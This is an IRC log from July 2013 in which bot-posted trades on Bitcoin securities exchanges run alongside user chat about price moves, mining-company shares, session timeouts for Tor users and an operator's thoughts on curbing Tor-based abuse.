Jul 31 12:11:58 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002949 = 0.0029 BTC [+] Jul 31 12:12:06 butbutbut.. iirc, withdrawals are not supported?! Jul 31 12:12:33 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [+] Jul 31 12:12:41 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Jul 31 12:12:59 or just deprecated? Jul 31 12:13:06 0,o Jul 31 12:13:34 [BTCTC] [ACTIVEMINING] 25 @ 0.004301 = 0.1075 BTC [+] Jul 31 12:13:35 deposits flushed. Jul 31 12:13:36 [BTCTC] [ACTIVEMINING] 30 @ 0.0043 = 0.129 BTC [-] Jul 31 12:13:44 [HAVELOCK] [SMG] 1 @ 0.0002697 BTC [+] Jul 31 12:13:54 if i update my order, does it put me at the back of the queue? Jul 31 12:13:56 jurov im just saying so Jul 31 12:14:12 not actually doing anything Jul 31 12:14:37 i know. sayin' just to improve the mood Jul 31 12:14:59 [BTCTC] [DMS.SELLING] 20 @ 0.02219 = 0.4438 BTC [+] Jul 31 12:15:00 [BTCTC] [S.MPOE-PT] 2 @ 0.0009399 = 0.0019 BTC [+] Jul 31 12:15:18 [BTCTC] [KENILWORTH] 1 @ 0.001797 BTC [+] Jul 31 12:15:34 [BTCTC] [DMS.MINING] 20 @ 0.007211 = 0.1442 BTC [+] Jul 31 12:15:36 [BTCTC] [DMS.MINING] 3980 @ 0.00721 = 28.6958 BTC [-] Jul 31 12:16:37 [BTCTC] [DMS.MINING] 20 @ 0.00721 = 0.1442 BTC [-] Jul 31 12:16:39 [BTCTC] [DMS.MINING] 1 @ 0.007201 BTC [-] Jul 31 12:16:42 [BTCTC] [DMS.MINING] 130 @ 0.00711 = 0.9243 BTC [-] Jul 31 12:16:44 [BTCTC] [DMS.MINING] 2 @ 0.007104 = 0.0142 BTC [-] Jul 31 12:16:46 [BTCTC] [DMS.MINING] 1 @ 0.007102 BTC [-] Jul 31 12:16:53 [BTCTC] [DMS.MINING] 2780 @ 0.007001 = 19.4628 BTC [-] Jul 31 12:17:28 [BTCTC] [ACTIVEMINING] 25 @ 0.004201 = 0.105 BTC [-] Jul 31 12:17:30 [BTCTC] [ACTIVEMINING] 250 @ 0.004201 = 1.0503 BTC [-] Jul 31 12:17:33 [BTCTC] [ACTIVEMINING] 225 @ 0.0042 = 0.945 BTC [-] Jul 31 12:18:41 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [+] Jul 31 12:18:55 [BTCTC] [TAT.ASICMINER] 40 @ 0.03997 = 1.5988 BTC [+] Jul 31 12:19:00 [BTCTC] [ACTIVEMINING] 1025 @ 0.0042 = 4.305 BTC [-] Jul 31 12:19:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.03928 = 0.1178 BTC [-] Jul 31 12:20:56 [BTCTC] [ASICMINER-PT] 2 @ 4.051 = 8.102 BTC [+] Jul 31 12:23:54 [BTCTC] [ACTIVEMINING] 750 @ 0.004535 = 3.4013 BTC [+] Jul 31 12:23:56 [BTCTC] [ACTIVEMINING] 50 @ 0.004548 = 0.2274 BTC [+] Jul 31 12:23:58 [BTCTC] [ACTIVEMINING] 325 @ 0.00455 = 1.4788 BTC [+] Jul 31 12:24:00 [BTCTC] [ACTIVEMINING] 125 @ 0.00462 = 0.5775 BTC [+] Jul 31 12:24:33 [BTCTC] [ACTIVEMINING] 25 @ 0.004619 = 0.1155 BTC [-] Jul 31 12:24:35 [BTCTC] [ACTIVEMINING] 155 @ 0.00462 = 0.7161 BTC [+] Jul 31 12:24:36 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [+] Jul 31 12:24:48 [BTCTC] [ASICMINER-PT] 2 @ 4.05 = 8.1 BTC [-] Jul 31 12:25:18 [BTCTC] [ACTIVEMINING] 6 @ 0.006235 = 0.0374 BTC [+] Jul 31 12:26:25 [BTCTC] [ACTIVEMINING] 25 @ 0.004615 = 0.1154 BTC [-] Jul 31 12:26:51 [BTCTC] [ACTIVEMINING] 2 @ 0.004613 = 0.0092 BTC [-] Jul 31 12:27:12 [BTCTC] [ACTIVEMINING] 25 @ 0.004261 = 0.1065 BTC [-] Jul 31 12:27:14 [BTCTC] [ACTIVEMINING] 25 @ 0.00426 = 0.1065 BTC [-] Jul 31 12:27:37 [BTCTC] [ACTIVEMINING] 25 @ 0.004501 = 0.1125 BTC [+] Jul 31 12:27:39 [BTCTC] [ACTIVEMINING] 275 @ 0.0045 = 1.2375 BTC [-] Jul 31 12:28:12 [BTCTC] [ACTIVEMINING] 15 @ 0.004616 = 0.0692 BTC [+] Jul 31 12:28:46 [BTCTC] [ACTIVEMINING] 25 @ 0.004511 = 0.1128 BTC [-] Jul 31 12:29:23 [BTCTC] [ACTIVEMINING] 100 @ 0.00451 = 0.451 BTC [-] Jul 31 12:29:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.03997 = 0.1999 BTC [+] Jul 31 12:30:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.03997 = 0.3997 BTC [+] Jul 31 12:30:35 [BTCTC] [ACTIVEMINING] 2 @ 0.0045 = 0.009 BTC [-] Jul 31 12:31:47 [BTCTC] [DMS.SELLING] 68 @ 0.02219 = 1.5089 BTC [+] Jul 31 12:31:50 [BTCTC] [DMS.SELLING] 41 @ 0.02298 = 0.9422 BTC [+] Jul 31 12:31:53 [BTCTC] [DMS.SELLING] 40 @ 0.023 = 0.92 BTC [+] Jul 31 12:32:22 [BTCTC] [ACTIVEMINING] 25 @ 0.004609 = 0.1152 BTC [+] Jul 31 12:32:25 [BTCTC] [ACTIVEMINING] 50 @ 0.004614 = 0.2307 BTC [+] Jul 31 12:32:27 [BTCTC] [ACTIVEMINING] 400 @ 0.004618 = 1.8472 BTC [+] Jul 31 12:33:19 [BTCTC] [TAT.ASICMINER] 28 @ 0.03997 = 1.1192 BTC [+] Jul 31 12:33:22 [BTCTC] [TAT.ASICMINER] 114 @ 0.03997 = 4.5566 BTC [+] Jul 31 12:33:59 [BTCTC] [ACTIVEMINING] 50 @ 0.004614 = 0.2307 BTC [-] Jul 31 12:34:19 [BTCTC] [ACTIVEMINING] 25 @ 0.004607 = 0.1152 BTC [-] Jul 31 12:35:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.039 = 0.975 BTC [-] Jul 31 12:37:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.039 = 0.156 BTC [-] Jul 31 12:38:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.039 = 0.156 BTC [-] Jul 31 12:41:17 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Jul 31 12:43:33 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195 = 0.585 BTC [-] Jul 31 12:45:54 [BTCTC] [ACTIVEMINING] 25 @ 0.004601 = 0.115 BTC [-] Jul 31 12:46:20 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [-] Jul 31 12:46:23 [BTCTC] [ASICMINER-PT] 4 @ 4.05 = 16.2 BTC [-] Jul 31 12:46:41 [BTCTC] [ACTIVEMINING] 844 @ 0.0076 = 6.4144 BTC [+] Jul 31 12:46:51 [BTCTC] [ACTIVEMINING] 300 @ 0.00461 = 1.383 BTC [-] Jul 31 12:46:53 [BTCTC] [ACTIVEMINING] 25 @ 0.004944 = 0.1236 BTC [+] Jul 31 12:46:55 [BTCTC] [ACTIVEMINING] 882 @ 0.004945 = 4.3615 BTC [+] Jul 31 12:47:15 [BTCTC] [ACTIVEMINING] 475 @ 0.00465 = 2.2088 BTC [-] Jul 31 12:47:47 what? activemining straight from 0.004601 to 0.0076? ... not possible Jul 31 12:47:55 ell Jul 31 12:47:56 ppl are selling off Jul 31 12:47:59 to but labcoin Jul 31 12:48:01 so they can flip it Jul 31 12:48:05 and then buy activemining back cheap Jul 31 12:48:18 [BTCTC] [ACTIVEMINING] 25 @ 0.004942 = 0.1236 BTC [+] Jul 31 12:48:21 i doubt theyve thought that many layers deep Jul 31 12:48:26 I mean it's literally not possible as there is a lot of asks between Jul 31 12:48:34 since labcoin looks to push its chips out after both activeM and asicminers first/next rounds Jul 31 12:48:48 even AM droped .3btc already Jul 31 12:48:53 yep Jul 31 12:49:01 i blame TAT Jul 31 12:49:02 saulismus: put option Jul 31 12:49:11 i think Jul 31 12:49:13 i blame Ukyo Jul 31 12:49:20 you listed AMC remember! Jul 31 12:49:28 yup Jul 31 12:49:29 no issue with amc yet Jul 31 12:49:30 hehe Jul 31 12:49:34 btct listed it tooo Jul 31 12:49:36 community demand Jul 31 12:49:37 on both Jul 31 12:49:39 so boo Jul 31 12:49:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004601 = 0.115 BTC Jul 31 12:49:41 [BTCTC] [ACTIVEMINING] 844 @ 0.0076 = 6.4144 BTC Jul 31 12:49:55 you can't always get what you want Jul 31 12:49:56 2013-07-31 10:46:37 Put Option 844 ฿ 0.0076 ฿ 6.4144 Jul 31 12:49:57 i just mean they started this latest invetsor craze Jul 31 12:50:08 it can't go straight from 0.004601 to 0.0076 as there is like 24000 shares of asks in between Jul 31 12:50:11 actually asicminer started it Jul 31 12:50:17 2013-07-31 10:46:37 Put Option 844 B 0.0076 B 6.4144 Jul 31 12:50:18 amc and labcoin and gargenwhatever is jumping on Jul 31 12:50:21 AMC made me rich! No wait, LabCoin made me rich! Jul 31 12:50:22 aha, ok Jul 31 12:50:34 confusing. Jul 31 12:50:37 asicminer started it for real though Jul 31 12:50:43 like they actually make money Jul 31 12:50:48 they just got their chip sout Jul 31 12:50:54 i amc and labcoin put out chips Jul 31 12:50:57 are they bad? Jul 31 12:51:06 ? Jul 31 12:51:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.03677 = 0.3677 BTC [-] Jul 31 12:51:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00261 BTC [+] Jul 31 12:51:47 i will do my best to watch out ofr investors Jul 31 12:52:05 amc gave me lots of data to proove he's trying Jul 31 12:52:09 and the cumminty deanded it Jul 31 12:52:11 so i allowed it Jul 31 12:52:17 does that make it worth its value? no Jul 31 12:52:26 the same could be same about btc. :P Jul 31 12:52:29 that's the stock market for you, not driven by value Jul 31 12:52:29 and they do say it Jul 31 12:52:30 i dont blame you for crazy investors Jul 31 12:52:42 ThickAsThieves: then everyime you profit, you shoudl thank me Jul 31 12:52:45 7466 btc till 0.001 on labcoin.. hmm.. Jul 31 12:53:08 i spend 20% of my day thanking you Jul 31 12:53:09 bitfunder logouts are a pita Jul 31 12:53:13 logouts? Jul 31 12:53:15 oh Jul 31 12:53:17 multi-device? Jul 31 12:53:23 one device Jul 31 12:53:30 multiple browsers? Jul 31 12:53:35 [HAVELOCK] [HIM] 4 @ 0.14 = 0.56 BTC [+] Jul 31 12:53:43 or ip changes? Jul 31 12:53:48 it is possible that i am changing ip addresses, but it feels more like a straight timeout Jul 31 12:53:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.03677 = 0.3309 BTC [-] Jul 31 12:53:53 [HAVELOCK] [HIM] 8 @ 0.145 = 1.16 BTC [+] Jul 31 12:53:58 ip change will kill a session Jul 31 12:54:01 to stop ses hijack Jul 31 12:54:10 [BTCTC] [ASICMINER-PT] 3 @ 4.05 = 12.15 BTC [-] Jul 31 12:54:20 it makes me grumpy Jul 31 12:54:28 i log in about once per minute Jul 31 12:54:29 ips sohouldnt change that often tho Jul 31 12:54:31 0,0 Jul 31 12:54:33 thats horrid Jul 31 12:54:37 ya Jul 31 12:54:38 lets talk more tomorrow Jul 31 12:54:42 and i will try to find a fix for you Jul 31 12:54:46 thx Jul 31 12:54:47 http://blog.gilly.ws/wp-content/uploads/2012/11/Grumpy-Cat-beeing-grumpy.jpg Jul 31 12:54:49 your ip shouldnt change that often tho Jul 31 12:54:56 you tor'ing ? Jul 31 12:54:57 or something Jul 31 12:55:03 yes on tor Jul 31 12:55:06 oh Jul 31 12:55:13 complications :\ Jul 31 12:55:15 then you should hear my rant about tor Jul 31 12:55:19 heh Jul 31 12:55:25 i was debating putting extra shit Jul 31 12:55:28 on tor logins Jul 31 12:55:37 its caused me some major headaches lately Jul 31 12:55:43 what sort of extra shit? Jul 31 12:55:50 dunno Jul 31 12:55:53 the log in every 60 seconds is already a pita :) Jul 31 12:55:55 i respect ppls privacy Jul 31 12:56:04 but at the same time Jul 31 12:56:08 its being used to try to hurt bitfunder Jul 31 12:56:20 my safeguards caught someone who managed to find a bug the other day Jul 31 12:56:31 created a bunch of accounts, moved some shit around like crazy Jul 31 12:56:33 how is tor used to hurt bf? Jul 31 12:56:34 it was a nightmare to clean up Jul 31 12:56:43 [BTCTC] [LTC-ATF.B2] 10 @ 0.01019 = 0.1019 BTC [-] Jul 31 12:56:45 [BTCTC] [LTC-ATF.B2] 100 @ 0.01018 = 1.018 BTC [-] Jul 31 12:56:49 [BTCTC] [LTC-ATF.B2] 25 @ 0.01016 = 0.254 BTC [-] Jul 31 12:56:52 [BTCTC] [LTC-ATF.B2] 9 @ 0.01015 = 0.0914 BTC [-] Jul 31 12:56:53 [BTCTC] [LTC-ATF.B2] 16 @ 0.0101 = 0.1616 BTC [-] Jul 31 12:56:55 [BTCTC] [LTC-ATF.B2] 1 @ 0.0101 BTC [-] Jul 31 12:56:57 [BTCTC] [LTC-ATF.B2] 35 @ 0.01002 = 0.3507 BTC [-] Jul 31 12:56:59 [BTCTC] [LTC-ATF.B2] 100 @ 0.01001 = 1.001 BTC [-] Jul 31 12:57:01 because most ppls ip's dont change that often Jul 31 12:57:02 [BTCTC] [LTC-ATF.B2] 50 @ 0.01001 = 0.5005 BTC [-] Jul 31 12:57:05 [BTCTC] [LTC-ATF.B2] 2654 @ 0.010001 = 26.5427 BTC [-] Jul 31 12:57:05 as cat said Jul 31 12:57:09 tor changes constantly Jul 31 12:57:11 yea Jul 31 12:57:28 [HAVELOCK] [HIM] 10 @ 0.15 = 1.5 BTC [+] Jul 31 12:57:32 so its like a ddos Jul 31 12:57:39 when someone wants to make attempts through it Jul 31 12:57:52 this one guy had registered over 100 outlook.com addresses Jul 31 12:57:57 and was creating accounts left and right Jul 31 12:58:23 i assumed real ddos would have many degrees more impact Jul 31 12:58:27 that seems like an expensive way to create pain, but certainly a pita for you Jul 31 12:58:40 its just one example Jul 31 12:58:41 of many Jul 31 12:58:42 well yea Jul 31 12:58:45 okay :) Jul 31 12:58:49 i almost did block tor the other day Jul 31 12:58:52 ddos come in many forms Jul 31 12:58:55 pure data Jul 31 12:58:58 requests Jul 31 12:59:00 logs Jul 31 12:59:03 log filling even Jul 31 12:59:07 sql entry filling Jul 31 12:59:08 [BTCTC] [ACTIVEMINING] 25 @ 0.004706 = 0.1177 BTC [-] Jul 31 12:59:25 [BTCTC] [ACTIVEMINING] 25 @ 0.004706 = 0.1177 BTC [-] Jul 31 12:59:28 i've been seeing a lot of log-filling from turkish ips lately Jul 31 12:59:51 and while i really do resepect ppls privacy. tor is just making it hard to do so Jul 31 13:00:15 i might... Jul 31 13:00:17 and seriously might Jul 31 13:00:18 [HAVELOCK] [AM100] 24 @ 0.04099998 = 0.984 BTC [+] Jul 31 13:00:19 block tor Jul 31 13:00:21 [BTCTC] [ACTIVEMINING] 25 @ 0.004706 = 0.1177 BTC [-] Jul 31 13:00:22 and setup a tor hidden service Jul 31 13:00:24 for tor only users Jul 31 13:00:35 and put some heavier restrictions on it Jul 31 13:00:38 well.. with a hidden service, i can deal :) Jul 31 13:00:45 [BTCTC] [ACTIVEMINING] 50 @ 0.004946 = 0.2473 BTC [+] Jul 31 13:00:47 [BTCTC] [ACTIVEMINING] 25 @ 0.004949 = 0.1237 BTC [+] Jul 31 13:00:56 [BTCTC] [LTC-ATF.B2] 3500 @ 0.01001 = 35.035 BTC [+] Jul 31 13:00:58 [BTCTC] [LTC-ATF.B2] 1500 @ 0.010001 = 15.0015 BTC [-] Jul 31 13:01:01 a tor exchange could do well Jul 31 13:01:16 good idea Jul 31 13:01:32 i've been thinking about a tor exchange. i am just concerned about the problem from a trade bot's point of view Jul 31 13:01:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004945 = 0.1236 BTC [-] Jul 31 13:01:46 [BTCTC] [ACTIVEMINING] 50 @ 0.004946 = 0.2473 BTC [+] Jul 31 13:01:48 [BTCTC] [ACTIVEMINING] 50 @ 0.00495 = 0.2475 BTC [+] Jul 31 13:01:49 [BTCTC] [ACTIVEMINING] 155 @ 0.00505 = 0.7828 BTC [+] Jul 31 13:01:50 tor can't really cope with exchange load. Jul 31 13:02:05 then it would die Jul 31 13:02:27 but you would only need to serve a subset of users Jul 31 13:02:30 well, i wasn't thinking of btc/some_govt_fiat exchange Jul 31 13:02:56 [BTCTC] [ACTIVEMINING] 25 @ 0.004851 = 0.1213 BTC [-] Jul 31 13:03:08 i was thinking of crypto/derivative type exchange Jul 31 13:03:12 [BTCTC] [ACTIVEMINING] 25 @ 0.004851 = 0.1213 BTC [-] Jul 31 13:03:23 [BTCTC] [COGNITIVE] 10 @ 0.5025 = 5.025 BTC [-] Jul 31 13:03:33 random_cat: then those users Jul 31 13:03:36 have to trust the issuers Jul 31 13:03:36 [BTCTC] [ACTIVEMINING] 25 @ 0.005049 = 0.1262 BTC [+] Jul 31 13:03:40 who wont wanna say who they are Jul 31 13:04:08 guess thats what would be expected tho Jul 31 13:04:14 bigger gamble for privacy Jul 31 13:04:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005049 = 0.1262 BTC [+] Jul 31 13:04:19 [BTCTC] [ACTIVEMINING] 9 @ 0.00505 = 0.0455 BTC [+] Jul 31 13:04:23 [BTCTC] [ACTIVEMINING] 36 @ 0.00505 = 0.1818 BTC [+] Jul 31 13:04:27 but i would expect most issuers to get funds Jul 31 13:04:30 and dissapear Jul 31 13:04:44 i'd add a tor layer so to say but with the same endpoint instead of a seperate new trading plattform - if that makes sense Jul 31 13:04:46 well... really it's a matter of trusting the exchange/clearing house Jul 31 13:05:00 [MPEX] [S.MPOE] 5750 @ 0.00080561 = 4.6323 BTC [+] Jul 31 13:05:05 [BTCTC] [ASICMINER-PT] 1 @ 4.043 BTC [-] Jul 31 13:05:07 [MPEX] [S.MPOE] 12650 @ 0.00080755 = 10.2155 BTC [+] Jul 31 13:05:07 no, it would be a matter of trusting the asset issuers Jul 31 13:05:08 [MPEX] [S.MPOE] 550 @ 0.00080886 = 0.4449 BTC [+] Jul 31 13:05:15 on an all tor exchange Jul 31 13:05:19 [BTCTC] [ASICMINER-PT] 1 @ 4.042 BTC [-] Jul 31 13:05:24 issuer pops up, raises btc Jul 31 13:05:26 dissapears Jul 31 13:05:27 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [-] Jul 31 13:05:30 no recourse at all Jul 31 13:05:32 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [-] Jul 31 13:05:37 [BTCTC] [ASICMINER-PT] 5 @ 4.04 = 20.2 BTC [-] Jul 31 13:05:39 [BTCTC] [ASICMINER-PT] 10 @ 4.03 = 40.3 BTC [-] Jul 31 13:05:41 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 31 13:05:44 [BTCTC] [ASICMINER-PT] 8 @ 4.01 = 32.08 BTC [-] Jul 31 13:05:46 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 31 13:05:48 [BTCTC] [ASICMINER-PT] 5 @ 4.01 = 20.05 BTC [-] Jul 31 13:05:53 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Jul 31 13:06:02 no asset issuer would post any link to real entities, websites, etc Jul 31 13:06:04 on a derivative only exchange, the asset issuer problem is elsewhere Jul 31 13:06:17 pm Jul 31 13:06:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.03676 BTC [-] Jul 31 13:10:19 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 31 13:10:47 [BTCTC] [ASICMINER-PT] 9 @ 4.01 = 36.09 BTC [-] Jul 31 13:12:37 anyway, i will continue to make noise from time to time about the logouts. i think you understand the score now Jul 31 13:14:25 [BTCTC] [ACTIVEMINING] 150 @ 0.0076 = 1.14 BTC [+] Jul 31 13:14:28 [BTCTC] [ACTIVEMINING] 12 @ 0.00515 = 0.0618 BTC [-] Jul 31 13:14:43 [BTCTC] [ACTIVEMINING] 16 @ 0.005149 = 0.0824 BTC [-] Jul 31 13:15:06 simple workaround would be an option with big security warnings to perserve the session Jul 31 13:15:15 [BTCTC] [ACTIVEMINING] 9 @ 0.005148 = 0.0463 BTC [-] Jul 31 13:15:17 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Jul 31 13:16:11 [BTCTC] [ACTIVEMINING] 25 @ 0.005148 = 0.1287 BTC [-] Jul 31 13:16:13 [BTCTC] [ACTIVEMINING] 50 @ 0.005149 = 0.2575 BTC [+] Jul 31 13:16:15 [BTCTC] [ACTIVEMINING] 188 @ 0.00515 = 0.9682 BTC [+] Jul 31 13:16:17 [BTCTC] [ACTIVEMINING] 5 @ 0.005211 = 0.0261 BTC [+] Jul 31 13:16:19 [BTCTC] [ACTIVEMINING] 200 @ 0.00525 = 1.05 BTC [+] Jul 31 13:16:21 [BTCTC] [ACTIVEMINING] 5 @ 0.005288 = 0.0264 BTC [+] Jul 31 13:16:24 [BTCTC] [ACTIVEMINING] 73 @ 0.005299 = 0.3868 BTC [+] Jul 31 13:16:28 [BTCTC] [ACTIVEMINING] 441 @ 0.0053 = 2.3373 BTC [+] Jul 31 13:16:30 [BTCTC] [ACTIVEMINING] 33 @ 0.005349 = 0.1765 BTC [+] Jul 31 13:16:32 [BTCTC] [ACTIVEMINING] 200 @ 0.00535 = 1.07 BTC [+] Jul 31 13:16:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005549 = 0.2775 BTC [+] Jul 31 13:16:36 [BTCTC] [ACTIVEMINING] 187 @ 0.00555 = 1.0379 BTC [+] Jul 31 13:16:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005147 = 0.1287 BTC [-] Jul 31 13:17:11 [BTCTC] [ACTIVEMINING] 25 @ 0.005148 = 0.1287 BTC [+] Jul 31 13:17:15 [BTCTC] [ACTIVEMINING] 65 @ 0.005147 = 0.3346 BTC [-] Jul 31 13:21:09 that was my suggestion Jul 31 13:21:26 with default being operator's preferenc Jul 31 13:21:29 e Jul 31 13:22:05 [HAVELOCK] [HIM] 1 @ 0.149 BTC [-] Jul 31 13:22:08 [HAVELOCK] [HIM] 7 @ 0.15 = 1.05 BTC [+] Jul 31 13:26:03 [HAVELOCK] [AM100] 2 @ 0.039 = 0.078 BTC [-] Jul 31 13:26:06 [HAVELOCK] [AM100] 12 @ 0.03851 = 0.4621 BTC [-] Jul 31 13:27:31 [BTCTC] [ACTIVEMINING] 101 @ 0.0076 = 0.7676 BTC [+] Jul 31 13:28:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [+] Jul 31 13:29:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.038 = 0.76 BTC [+] Jul 31 13:29:03 [BTCTC] [ACTIVEMINING] 25 @ 0.005032 = 0.1258 BTC [-] Jul 31 13:29:06 [BTCTC] [ACTIVEMINING] 5 @ 0.005031 = 0.0252 BTC [-] Jul 31 13:29:08 [BTCTC] [ACTIVEMINING] 50 @ 0.005012 = 0.2506 BTC [-] Jul 31 13:29:11 [BTCTC] [ACTIVEMINING] 220 @ 0.00501 = 1.1022 BTC [-] Jul 31 13:29:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005499 BTC [+] Jul 31 13:29:25 [HAVELOCK] [AM100] 1 @ 0.03851 BTC [-] Jul 31 13:29:55 [BTCTC] [ACTIVEMINING] 11 @ 0.0054 = 0.0594 BTC [-] Jul 31 13:33:22 [HAVELOCK] [AM100] 55 @ 0.03851 = 2.1181 BTC [-] Jul 31 13:33:38 [HAVELOCK] [AM100] 105 @ 0.03851 = 4.0436 BTC [-] Jul 31 13:33:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [+] Jul 31 13:34:26 [HAVELOCK] [AM100] 75 @ 0.03851 = 2.8883 BTC [-] Jul 31 13:34:38 [HAVELOCK] [AM100] 5 @ 0.03851 = 0.1926 BTC [-] Jul 31 13:35:14 [HAVELOCK] [AM100] 65 @ 0.03851 = 2.5032 BTC [-] Jul 31 13:35:34 [BTCTC] [TAT.ASICMINER] 21 @ 0.0389 = 0.8169 BTC [+] Jul 31 13:35:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [+] Jul 31 13:35:42 [BTCTC] [DMS.MINING] 14 @ 0.007201 = 0.1008 BTC [+] Jul 31 13:35:45 [BTCTC] [DMS.MINING] 20 @ 0.0072 = 0.144 BTC [-] Jul 31 13:36:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.039 = 0.351 BTC [+] Jul 31 13:36:49 [BTCTC] [ASICMINER-PT] 2 @ 4.144 = 8.288 BTC [+] Jul 31 13:36:51 [BTCTC] [ASICMINER-PT] 4 @ 4.145 = 16.58 BTC [+] Jul 31 13:37:13 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002857 = 0.0143 BTC [+] Jul 31 13:37:24 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195 = 0.585 BTC [-] Jul 31 13:37:45 [BTCTC] [ASICMINER-PT] 2 @ 4.09 = 8.18 BTC [-] Jul 31 13:37:47 forward contracts: http://phoenix.craigslist.org/cph/bfd/3970946022.html Jul 31 13:38:12 [HAVELOCK] [HIM] 3 @ 0.15 = 0.45 BTC [+] Jul 31 13:38:15 [HAVELOCK] [HIM] 10 @ 0.155 = 1.55 BTC [+] Jul 31 13:38:17 [HAVELOCK] [HIM] 15 @ 0.1575 = 2.3625 BTC [+] Jul 31 13:38:19 [HAVELOCK] [HIM] 5 @ 0.16 = 0.8 BTC [+] Jul 31 13:38:21 [HAVELOCK] [HIM] 1 @ 0.174 BTC [+] Jul 31 13:38:23 [HAVELOCK] [HIM] 2 @ 0.175 = 0.35 BTC [+] Jul 31 13:38:26 [HAVELOCK] [HIM] 3 @ 0.176 = 0.528 BTC [+] Jul 31 13:38:28 [HAVELOCK] [HIM] 1 @ 0.177 BTC [+] Jul 31 13:40:04 [BTCTC] [ACTIVEMINING] 1 @ 0.005012 BTC [-] Jul 31 13:40:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005489 = 0.1372 BTC [+] Jul 31 13:41:00 [BTCTC] [ACTIVEMINING] 45 @ 0.00549 = 0.2471 BTC [+] Jul 31 13:41:02 [BTCTC] [ACTIVEMINING] 46 @ 0.00549 = 0.2525 BTC [+] Jul 31 13:41:10 [BTCTC] [ACTIVEMINING] 34 @ 0.0055 = 0.187 BTC [+] Jul 31 13:41:17 [BTCTC] [ACTIVEMINING] 50 @ 0.0055 = 0.275 BTC [+] Jul 31 13:41:19 [BTCTC] [ACTIVEMINING] 50 @ 0.0056 = 0.28 BTC [+] Jul 31 13:41:21 [BTCTC] [ACTIVEMINING] 50 @ 0.0057 = 0.285 BTC [+] Jul 31 13:41:23 [BTCTC] [ACTIVEMINING] 50 @ 0.0058 = 0.29 BTC [+] Jul 31 13:41:25 [BTCTC] [ACTIVEMINING] 13 @ 0.0059 = 0.0767 BTC [+] Jul 31 13:41:30 [BTCTC] [ACTIVEMINING] 250 @ 0.005928 = 1.482 BTC [+] Jul 31 13:41:49 [BTCTC] [ACTIVEMINING] 100 @ 0.00593 = 0.593 BTC [+] Jul 31 13:41:54 [BTCTC] [ACTIVEMINING] 3721 @ 0.005942 = 22.1102 BTC [+] Jul 31 13:42:14 [BTCTC] [ACTIVEMINING] 25 @ 0.005941 = 0.1485 BTC [-] Jul 31 13:42:16 [BTCTC] [ACTIVEMINING] 46 @ 0.005942 = 0.2733 BTC [+] Jul 31 13:43:18 [BTCTC] [ACTIVEMINING] 25 @ 0.005979 = 0.1495 BTC [+] Jul 31 13:43:22 [BTCTC] [ACTIVEMINING] 30 @ 0.00598 = 0.1794 BTC [+] Jul 31 13:43:24 [BTCTC] [ACTIVEMINING] 85 @ 0.005994 = 0.5095 BTC [+] Jul 31 13:43:26 [BTCTC] [ACTIVEMINING] 300 @ 0.005999 = 1.7997 BTC [+] Jul 31 13:43:28 [BTCTC] [ACTIVEMINING] 57 @ 0.006 = 0.342 BTC [+] Jul 31 13:43:30 [BTCTC] [ACTIVEMINING] 2003 @ 0.006 = 12.018 BTC [+] Jul 31 13:45:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [+] Jul 31 13:46:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005949 = 0.1487 BTC [-] Jul 31 13:46:57 ;;ticker Jul 31 13:46:58 MtGox BTCUSD ticker | Best bid: 109.50341, Best ask: 109.54999, Bid-ask spread: 0.04658, Last trade: 108.42000, 24 hour volume: 44567.69916453, 24 hour low: 101.50000, 24 hour high: 111.65202, 24 hour vwap: 106.65905 Jul 31 13:47:03 [ANNOUNCEMENT] [XBOND] Bitcoin's Only Exchangeable Bond - https://bitcointalk.org/index.php?topic=265287.0 Jul 31 13:47:50 [BTCTC] [ACTIVEMINING] 50 @ 0.00595 = 0.2975 BTC [+] Jul 31 13:48:30 [BTCTC] [ACTIVEMINING] 5 @ 0.00598 = 0.0299 BTC [+] Jul 31 13:48:32 [BTCTC] [ACTIVEMINING] 50 @ 0.005998 = 0.2999 BTC [+] Jul 31 13:48:55 [BTCTC] [ACTIVEMINING] 4497 @ 0.006 = 26.982 BTC [+] Jul 31 13:49:00 [BTCTC] [ACTIVEMINING] 220 @ 0.0076 = 1.672 BTC [+] Jul 31 13:49:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.039 = 0.351 BTC [+] Jul 31 13:49:42 i bid 20btc Jul 31 13:49:52 [BTCTC] 